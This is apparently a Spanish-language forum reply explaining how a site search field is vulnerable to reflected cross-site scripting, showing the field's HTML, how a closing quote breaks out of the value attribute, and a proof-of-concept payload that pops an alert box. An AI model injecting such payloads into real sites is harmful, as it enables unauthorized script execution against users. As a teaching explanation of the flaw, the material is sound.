%22%3E equivale a
">.
Inicialmente el search es así,
size="14"
value="-title search-"
onclick="clickclear(this,'-title search-')"
onblur="clickrecall(this,'-title search-')"
type="text">
Pero si miras el retorno cuando le ingresas una comilla doble más de un >
(">), verás lo siguiente,
size="14"
value="\"
type="text">" onclick="clickclear(this,'-title search-')" onblur="clickrecall(this,'-title search-')" />
Aquí es donde lograste bypassearlo. Podes ingresar esto para mostrar un mensaje de alerta.
"><script>alert(/XSS/)</script>
ya que el search quedará así,
size="14"
value="\"
type="text"><script>alert(/XSS/)
</script>" onclick="clickclear(this,'-title search-')" onblur="clickrecall(this,'-title search-')" /
>
PD: No entendí, lo que no entiendes. xD